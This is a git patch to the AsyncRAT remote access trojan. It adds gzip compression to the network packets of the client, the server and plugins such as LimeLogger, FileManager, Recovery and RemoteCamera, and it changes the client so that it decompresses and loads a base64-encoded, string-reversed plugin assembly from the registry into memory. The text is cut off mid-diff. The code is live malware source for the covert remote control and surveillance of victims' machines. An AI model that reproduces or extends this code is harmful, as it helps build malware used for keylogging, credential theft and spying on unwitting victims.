From d1b57f42918dd0e7df51bd3c343c6bb48b77384d Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Sat, 5 Oct 2019 12:25:13 +0300 Subject: [PATCH] Update fixed bugs added Gzip compress/decompress for packets --- AsyncRAT-C#/Client/Algorithm/Zip.cs | 45 +++++++++++ AsyncRAT-C#/Client/Client.csproj | 1 + AsyncRAT-C#/Client/Connection/ClientSocket.cs | 14 ++-- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 15 +++- AsyncRAT-C#/Client/MessagePack/MsgPack.cs | 4 +- AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj | 1 + AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs | 14 ++-- .../Plugin/Chat/Chat/MessagePack/MsgPack.cs | 3 +- AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs | 45 +++++++++++ AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs | 14 ++-- AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj | 1 + .../Plugin/Extra/Extra/MessagePack/MsgPack.cs | 3 +- AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs | 45 +++++++++++ .../FileManager/FileManager/Connection.cs | 16 ++-- .../FileManager/FileManager.csproj | 1 + .../FileManager/MessagePack/MsgPack.cs | 3 +- .../FileManager/FileManager/TempSocket.cs | 14 ++-- .../Plugin/FileManager/FileManager/Zip.cs | 45 +++++++++++ .../LimeLogger/LimeLogger/Connection.cs | 14 ++-- .../LimeLogger/LimeLogger/LimeLogger.csproj | 1 + .../LimeLogger/MessagePack/MsgPack.cs | 3 +- .../Plugin/LimeLogger/LimeLogger/Zip.cs | 45 +++++++++++ .../Miscellaneous/Miscellaneous/Connection.cs | 14 ++-- .../Miscellaneous/Miscellaneous/ILMerge.props | 2 +- .../Miscellaneous/MessagePack/MsgPack.cs | 3 +- .../Miscellaneous/Miscellaneous.csproj | 1 + .../Plugin/Miscellaneous/Miscellaneous/Zip.cs | 45 +++++++++++ .../Plugin/Options/Options/Connection.cs | 14 ++-- .../Options/Options/MessagePack/MsgPack.cs | 3 +- .../Plugin/Options/Options/Options.csproj | 1 + AsyncRAT-C#/Plugin/Options/Options/Zip.cs | 45 +++++++++++ .../ProcessManager/Connection.cs | 14 ++-- .../ProcessManager/MessagePack/MsgPack.cs | 3 +- .../ProcessManager/ProcessManager.csproj | 1 + .../ProcessManager/ProcessManager/Zip.cs | 45 +++++++++++ .../Recovery/Browsers/Chromium/Chromium.cs | 20 ++--- .../Recovery/Browsers/Firefox/Firefox.cs | 51 ++++++------ .../Recovery/Recovery/MessagePack/MsgPack.cs | 3 +- .../Plugin/Recovery/Recovery/Packet.cs | 10 +-- .../Plugin/Recovery/Recovery/Recovery.csproj | 3 + AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs | 45 +++++++++++ .../RemoteCamera/RemoteCamera/Connection.cs | 14 ++-- .../RemoteCamera/MessagePack/MsgPack.cs | 3 +- .../RemoteCamera/RemoteCamera.csproj | 1 + .../Plugin/RemoteCamera/RemoteCamera/Zip.cs | 45 +++++++++++ .../RemoteDesktop/RemoteDesktop/Connection.cs | 14 ++-- .../RemoteDesktop/MessagePack/MsgPack.cs | 3 +- .../RemoteDesktop/RemoteDesktop/Packet.cs | 1 + .../RemoteDesktop/RemoteDesktop.csproj | 1 + .../Plugin/RemoteDesktop/RemoteDesktop/Zip.cs | 45 +++++++++++ .../Plugin/SendFile/SendFile/Connection.cs | 15 ++-- .../SendFile/SendFile/Handler/HandleSendTo.cs | 6 +- .../SendFile/Handler/HandleUninstall.cs | 6 +- .../SendFile/SendFile/MessagePack/MsgPack.cs | 3 +- .../Plugin/SendFile/SendFile/Methods.cs | 40 +++++++++- AsyncRAT-C#/Plugin/SendFile/SendFile/RunPE.cs | 2 +- .../Plugin/SendFile/SendFile/SendFile.csproj | 1 + AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs | 45 +++++++++++ AsyncRAT-C#/Server/Algorithm/Zip.cs | 46 +++++++++++ AsyncRAT-C#/Server/Connection/Clients.cs | 8 +- AsyncRAT-C#/Server/Connection/Listener.cs | 2 +- AsyncRAT-C#/Server/Forms/Form1.cs | 78 +++++++++++-------- .../Server/Forms/FormAbout.Designer.cs | 4 +- AsyncRAT-C#/Server/Forms/FormAbout.resx | 10 +++ AsyncRAT-C#/Server/Forms/FormBuilder.cs | 5 +- .../Server/Forms/FormSendFileToMemory.cs | 51 ++++++------ .../Server/Handle Packet/HandleListView.cs | 2 +- .../Server/Handle Packet/HandleRecovery.cs | 12 ++- AsyncRAT-C#/Server/Handle Packet/Packet.cs | 9 +-- AsyncRAT-C#/Server/Helper/Methods.cs | 7 +- AsyncRAT-C#/Server/ILMerge.props | 2 +- AsyncRAT-C#/Server/MessagePack/MsgPack.cs | 4 +- AsyncRAT-C#/Server/Server.csproj | 3 +- AsyncRAT-C#/Server/Settings.cs | 2 +- 74 files changed, 908 insertions(+), 252 deletions(-) create mode 100644 AsyncRAT-C#/Client/Algorithm/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/FileManager/FileManager/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Options/Options/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/Recovery/Recovery/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Zip.cs create mode 100644 AsyncRAT-C#/Plugin/SendFile/SendFile/Zip.cs create mode 100644 AsyncRAT-C#/Server/Algorithm/Zip.cs diff --git a/AsyncRAT-C#/Client/Algorithm/Zip.cs b/AsyncRAT-C#/Client/Algorithm/Zip.cs new file mode 100644 index 0000000..0dad786 --- /dev/null +++ b/AsyncRAT-C#/Client/Algorithm/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Client.Algorithm +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index 0116154..35858a5 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -74,6 +74,7 @@ + diff --git a/AsyncRAT-C#/Client/Connection/ClientSocket.cs b/AsyncRAT-C#/Client/Connection/ClientSocket.cs index 46d31c4..03a8a1e 100644 --- a/AsyncRAT-C#/Client/Connection/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Connection/ClientSocket.cs @@ -163,16 +163,12 @@ namespace Client.Connection return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 9dfa87d..91cf431 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -33,7 +33,8 @@ namespace Client.Handle_Packet case "plugin": // run plugin in memory { - Assembly assembly = AppDomain.CurrentDomain.Load(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString)))); + Received(); + Assembly assembly = AppDomain.CurrentDomain.Load(Zip.Decompress(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString))))); Type type = assembly.GetType("Plugin.Plugin"); dynamic instance = Activator.CreateInstance(type); instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install); @@ -52,9 +53,9 @@ namespace Client.Handle_Packet List plugins = new List(); foreach (string plugin in unpack_msgpack.ForcePathObject("Hash").AsString.Split(',')) { - if (SetRegistry.GetValue(plugin.Trim()) == null) + if (SetRegistry.GetValue(plugin) == null) { - plugins.Add(plugin.Trim()); + plugins.Add(plugin); Debug.WriteLine("plguin not found"); } } @@ -84,6 +85,14 @@ namespace Client.Handle_Packet } } + private static void Received() + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "Received"; + ClientSocket.Send(msgpack.Encode2Bytes()); + Thread.Sleep(1000); + } + public static void Error(string ex) { MsgPack msgpack = new MsgPack(); diff --git a/AsyncRAT-C#/Client/MessagePack/MsgPack.cs b/AsyncRAT-C#/Client/MessagePack/MsgPack.cs index 7f4ebf3..b77c94e 100644 --- a/AsyncRAT-C#/Client/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Client/MessagePack/MsgPack.cs @@ -8,6 +8,7 @@ * 修复整数值为127时解码出来为0的情况,感谢(Putree 274638001)反馈 * 2015-07-14 15:28:45 */ +using Client.Algorithm; using System; using System.Collections; using System.Collections.Generic; @@ -494,6 +495,7 @@ namespace Client.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -835,7 +837,7 @@ namespace Client.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj b/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj index 65a58f3..a5fed79 100644 --- a/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj +++ b/AsyncRAT-C#/Plugin/Chat/Chat/Chat.csproj @@ -59,6 +59,7 @@ + diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs index 762fb3d..0ff8eaa 100644 --- a/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs +++ b/AsyncRAT-C#/Plugin/Chat/Chat/Connection.cs @@ -126,16 +126,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Chat/Chat/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs b/AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Chat/Chat/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs index 70a0271..be81e18 100644 --- a/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs +++ b/AsyncRAT-C#/Plugin/Extra/Extra/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj index a0ef481..ddcb928 100644 --- a/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj +++ b/AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj @@ -53,6 +53,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Extra/Extra/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs b/AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Extra/Extra/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs index c9e93f3..ef4dad4 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Connection.cs @@ -128,17 +128,13 @@ namespace Plugin IsConnected = false; return; } - MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); + MS.Write(Buffer, 0, rc); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj b/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj index 9339595..e235a1a 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/FileManager.csproj @@ -54,6 +54,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs index 23ec801..d0e8a12 100644 --- a/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/TempSocket.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/FileManager/FileManager/Zip.cs b/AsyncRAT-C#/Plugin/FileManager/FileManager/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/FileManager/FileManager/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs index d80ed26..bcbcafd 100644 --- a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs +++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj index fdb2807..38af0cf 100644 --- a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj +++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/LimeLogger.csproj @@ -52,6 +52,7 @@ + \ No newline at end of file diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs index 131eb37..397c240 100644 --- a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Zip.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs index 70a0271..be81e18 100644 --- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/ILMerge.props b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/ILMerge.props index aaadb12..b0fc9d2 100644 --- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/ILMerge.props +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/ILMerge.props @@ -41,7 +41,7 @@ - + false diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj index fccdb96..e764f20 100644 --- a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Miscellaneous.csproj @@ -70,6 +70,7 @@ True Resources.resx + diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Zip.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Zip.cs new file mode 100644 index 0000000..60db829 --- /dev/null +++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Zip.cs @@ -0,0 +1,45 @@ +using System; +using System.IO; +using System.IO.Compression; + +namespace Plugin +{ + public static class Zip + { + public static byte[] Decompress(byte[] input) + { + using (var source = new MemoryStream(input)) + { + byte[] lengthBytes = new byte[4]; + source.Read(lengthBytes, 0, 4); + + var length = BitConverter.ToInt32(lengthBytes, 0); + using (var decompressionStream = new GZipStream(source, + CompressionMode.Decompress)) + { + var result = new byte[length]; + decompressionStream.Read(result, 0, length); + return result; + } + } + } + + public static byte[] Compress(byte[] input) + { + using (var result = new MemoryStream()) + { + var lengthBytes = BitConverter.GetBytes(input.Length); + result.Write(lengthBytes, 0, 4); + + using (var compressionStream = new GZipStream(result, + CompressionMode.Compress)) + { + compressionStream.Write(input, 0, input.Length); + compressionStream.Flush(); + + } + return result.ToArray(); + } + } + } +} diff --git a/AsyncRAT-C#/Plugin/Options/Options/Connection.cs b/AsyncRAT-C#/Plugin/Options/Options/Connection.cs index 70a0271..be81e18 100644 --- a/AsyncRAT-C#/Plugin/Options/Options/Connection.cs +++ b/AsyncRAT-C#/Plugin/Options/Options/Connection.cs @@ -123,16 +123,12 @@ namespace Plugin return; } MS.Write(Buffer, 0, rc); - Buffer = new byte[Buffersize - MS.Length]; - } - if (MS.Length == Buffersize) - { - Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); - thread.Start(MS.ToArray()); - Buffer = new byte[4]; - MS.Dispose(); - MS = new MemoryStream(); } + Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read)); + thread.Start(MS.ToArray()); + Buffer = new byte[4]; + MS.Dispose(); + MS = new MemoryStream(); } } SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); diff --git a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs index 131eb37..f78f3f1 100644 --- a/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs +++ b/AsyncRAT-C#/Plugin/Options/Options/MessagePack/MsgPack.cs @@ -484,6 +484,7 @@ namespace Plugin.MessagePack { using (MemoryStream ms = new MemoryStream()) { + bytes = Zip.Decompress(bytes); ms.Write(bytes, 0, bytes.Length); ms.Position = 0; DecodeFromStream(ms); @@ -825,7 +826,7 @@ namespace Plugin.MessagePack byte[] r = new byte[ms.Length]; ms.Position = 0; ms.Read(r, 0, (int)ms.Length); - return r; + return Zip.Compress(r); } } diff --git 